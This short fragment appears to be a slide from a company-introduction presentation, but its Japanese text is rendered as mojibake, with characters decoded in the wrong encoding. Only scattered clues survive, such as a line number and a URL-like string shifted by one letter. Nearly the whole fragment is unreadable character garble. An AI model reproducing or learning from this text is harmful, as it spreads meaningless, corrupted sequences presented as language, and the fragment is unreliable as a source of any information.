    ΍ΒΕ͔ͯΒͰ͸஗͍Ͱ͢ɻ

88. ձࣾ঺հ IUUQTBEKQ w େࡕͷडୗϕϯμʔͰ͢ɻ
    w Θ͍Θ͍ΨϠΨϠ΍ͬͯΔձࣾͰ͢ɻ
    w ΤϯδχΞਵ࣌ืूதɻ